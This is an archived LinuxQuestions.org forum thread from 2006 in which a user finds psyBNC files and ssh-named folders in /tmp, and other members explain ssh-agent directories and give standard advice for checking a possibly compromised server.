LinuxQuestions.org
Support LQ: Use code LQ3 and save $3 on Domain Registration
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices

Reply
 
Search this Thread
Old 10-01-2006, 08:43 PM   #1
bytez
LQ Newbie
 
Registered: Sep 2006
Location: USA
Distribution: CentOS 4.5
Posts: 27

Rep: Reputation: 15
/tmp folder


I'm seeing many folders beginning with "ssh" is that normal? Also, noticed a psy folder there it looks like psybnc is installed. I have removed that folder and the psy.gz file.
 
Old 10-02-2006, 03:11 AM   #2
w3bd3vil
Senior Member
 
Registered: Jun 2006
Location: Hyderabad, India
Distribution: Fedora
Posts: 1,189

Rep: Reputation: 49
this could mean serious trouble. bnc must be installed in other places also. (my guess)
check your netstat for any new ports that are open. check ps for suspicious processes. use chkrootkit to see if it detects anything. you would want to see your logs as to where the intruder came in from.
This could probably be some thing like a remote file inclusion in phpbb or something, so check your apache logs.
search for world writeable directories too and see if there is anything installed on them.
 
Old 10-02-2006, 05:56 AM   #3
jkh
Member
 
Registered: Dec 2004
Location: Maidstone, Kent, England
Distribution: Ubuntu
Posts: 100

Rep: Reputation: 15
oh yeh, I have those folders too, always have (ssh folders). I assume they are harmless.
 
Old 10-04-2006, 06:06 AM   #4
richardash1981
LQ Newbie
 
Registered: Aug 2006
Posts: 25
Blog Entries: 1

Rep: Reputation: 18
If you are using ssh then temp folders may be normal, I don't get them with openssh though. Either way they won't be needed after a reboot, so removing the lot and rebooting should work fine (in theory, you can dump the whole of /tmp, but I've found X was a bit picky about that). If you think you might have a security problem then you need to get busy with netstat as w3bd3vil describes.
 
Old 10-04-2006, 08:21 AM   #5
Capt_Caveman
Senior Member
 
Registered: Mar 2003
Distribution: Fedora
Posts: 3,658

Rep: Reputation: 57
If you have a psybnc sourcecode in tmp and you didn't put it there, then that is very bad sign. First who owned the file(s)? I would also recommend that you don't delete any more files or directories until you have a better idea of what is going on. Do follow webdevil's advice and look carefully through your apache logs, especially for URLs that have shell commands like wget, cd, etc or contain psy.gz. Don't ignore the issue and delude yourself into thinking everything is ok until you can be definitely sure of that.

The following will give you a good start:
http://www.cert.org/tech_tips/intrud...checklist.html
http://www.cert.org/tech_tips/root_compromise.html

If you have any questions about stuff or don't know what to look for, then make sure to ask.
 
Old 10-04-2006, 08:05 PM   #6
sixerjman
Member
 
Registered: Sep 2004
Distribution: Debian Tesing / Unstable
Posts: 166
Blog Entries: 1

Rep: Reputation: 30
/tmp/ssh-XXXXXXXX file(s) may be ssh-agent files

If ssh-agent is started when a remote client logs in, a subdirectory of this type of name will be created and will contain one symbolic link named agent.PPPP where "PPPP" is
the PID of the agent.

One of these is created automatically when a local GNOME X session is started (probably also for KDE and other GUIs) so that an X terminal started in the GUI doesn't need to prompt for the password.
 
Old 10-04-2006, 08:15 PM   #7
sixerjman
Member
 
Registered: Sep 2004
Distribution: Debian Tesing / Unstable
Posts: 166
Blog Entries: 1

Rep: Reputation: 30
Check that, the PID is the PID of the process that invoked the agent. On my machine I currently have one such directory and the file is actually
a system file of some sort, not a symbolic link (I think).
 
Old 10-04-2006, 08:15 PM   #8
sixerjman
Member
 
Registered: Sep 2004
Distribution: Debian Tesing / Unstable
Posts: 166
Blog Entries: 1

Rep: Reputation: 30
...and the PID is that of "gnome-session". So noted regarding edit. :-)

Last edited by sixerjman; 10-26-2006 at 10:42 AM.
 
Old 10-21-2006, 05:23 AM   #9
jkh
Member
 
Registered: Dec 2004
Location: Maidstone, Kent, England
Distribution: Ubuntu
Posts: 100

Rep: Reputation: 15
very smart sixerjman I had no idea gnome did that, also for the future you can edit your post to add stuff to it rather than posting two more posts. just saying.
 
Old 10-24-2006, 01:10 AM   #10
jayjwa
Member
 
Registered: Jul 2003
Location: NY
Distribution: None (src & compile)
Posts: 253

Rep: Reputation: 36
"Pysbnc" (sort of a proxy for IRC clients, or "bouncer" as they call them) is usually the first thing added by script kiddies after a system break-in. If you didn't put it there, you're definately hacked. Worse, many times pysbnc (and other tools from these types) is infected with linux virus RST (judging from the samples I've collected over the years).

It's looking like re-build/re-install time...
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
TMP folder, is everything deletable in there? ginda Linux - Newbie 6 12-16-2006 01:43 PM
/var/tmp folder hardeep_ubhi Linux - General 4 10-02-2006 07:10 AM
What is all this junk in the /tmp folder? HoosTrax Linux - Newbie 2 02-10-2004 04:03 PM
make my /tmp folder bigger? Kaiser Linux - General 3 12-17-2003 08:14 PM
tmp folder question synaptical Linux - General 8 08-31-2003 03:10 PM


All times are GMT -5. The time now is 09:28 AM.

Main Menu
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
identi.ca: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration